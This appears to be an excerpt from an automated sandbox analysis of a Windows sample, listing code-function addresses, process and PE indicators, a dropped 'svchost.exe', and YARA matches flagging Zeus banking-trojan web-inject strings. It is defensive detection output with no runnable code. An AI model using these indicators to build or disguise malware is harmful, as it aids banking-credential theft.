Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE2BA027_2_00AE2BA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B1CBA027_2_00B1CBA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B1E39027_2_00B1E390
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AEE3E027_2_00AEE3E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B203C027_2_00B203C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE8B5027_2_00AE8B50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B244A027_2_00B244A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B1A48027_2_00B1A480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B1FCF027_2_00B1FCF0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B15CD027_2_00B15CD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AFD57027_2_00AFD570
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B1663027_2_00B16630
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B1F62027_2_00B1F620
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B0878027_2_00B08780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B2178027_2_00B21780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B1BF4027_2_00B1BF40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A858A027_2_00A858A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A7B88027_2_00A7B880
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A810F027_2_00A810F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A770D027_2_00A770D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A5E97027_2_00A5E970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A80A2027_2_00A80A20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A77A3027_2_00A77A30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A69B8027_2_00A69B80
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A7D34027_2_00A7D340
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A75C3027_2_00A75C30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A7EC0027_2_00A7EC00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A77C1027_2_00A77C10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A49D3027_2_00A49D30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A82EDD27_2_00A82EDD
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A706D027_2_00A706D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A7C6D027_2_00A7C6D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A8961327_2_00A89613
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A7565027_2_00A75650
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A43FA027_2_00A43FA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A7DFA027_2_00A7DFA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A7F79027_2_00A7F790
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A4F7E027_2_00A4F7E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A817C027_2_00A817C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A49F5027_2_00A49F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A893029_2_012A8930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012D483029_2_012D4830
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DD80029_2_012DD800
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012D681029_2_012D6810
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A8B5029_2_012A8B50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A2BA029_2_012A2BA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DCBA029_2_012DCBA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DE39029_2_012DE390
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012AE3E029_2_012AE3E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012E03C029_2_012E03C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012E821329_2_012E8213
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012D425029_2_012D4250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012CF2D029_2_012CF2D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DB2D029_2_012DB2D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012BD57029_2_012BD570
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012E44A029_2_012E44A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DA48029_2_012DA480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DFCF029_2_012DFCF0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012D5CD029_2_012D5CD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DBF4029_2_012DBF40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012C878029_2_012C8780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012E178029_2_012E1780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012DF62029_2_012DF620
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012D663029_2_012D6630
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0121E97029_2_0121E970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012458A029_2_012458A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0123B88029_2_0123B880
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012410F029_2_012410F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012370D029_2_012370D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0123D34029_2_0123D340
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01229B8029_2_01229B80
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01240A2029_2_01240A20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01237A3029_2_01237A30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01209D3029_2_01209D30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01235C3029_2_01235C30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0123EC0029_2_0123EC00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01237C1029_2_01237C10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01209F5029_2_01209F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01203FA029_2_01203FA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0123DFA029_2_0123DFA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0123F79029_2_0123F790
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0120F7E029_2_0120F7E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012417C029_2_012417C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0124961329_2_01249613
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0123565029_2_01235650
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012306D029_2_012306D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_0123C6D029_2_0123C6D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01242EDD29_2_01242EDD
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111893031_2_01118930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114681031_2_01146810
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114D80031_2_0114D800
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114483031_2_01144830
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01118B5031_2_01118B50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114E39031_2_0114E390
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01112BA031_2_01112BA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114CBA031_2_0114CBA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_011503C031_2_011503C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111E3E031_2_0111E3E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0115821331_2_01158213
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114425031_2_01144250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113F2D031_2_0113F2D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114B2D031_2_0114B2D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0112D57031_2_0112D570
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114A48031_2_0114A480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_011544A031_2_011544A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01145CD031_2_01145CD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114FCF031_2_0114FCF0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114BF4031_2_0114BF40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113878031_2_01138780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0115178031_2_01151780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114663031_2_01146630
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0114F62031_2_0114F620
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010CE97031_2_010CE970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010EB88031_2_010EB880
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010F58A031_2_010F58A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E70D031_2_010E70D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010F10F031_2_010F10F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010ED34031_2_010ED340
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010D9B8031_2_010D9B80
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010F0A2031_2_010F0A20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E7A3031_2_010E7A30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B9D3031_2_010B9D30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010EEC0031_2_010EEC00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E7C1031_2_010E7C10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E5C3031_2_010E5C30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B9F5031_2_010B9F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010EF79031_2_010EF790
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Process token adjusted: Security
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744
Source: Z8eHwAvqAh.exe Static PE information: Number of sections : 13 > 10
Source: svchost.exe.1.dr Static PE information: Number of sections : 13 > 10
Source: Z8eHwAvqAh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.3.svchost.exe.2700000.28.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
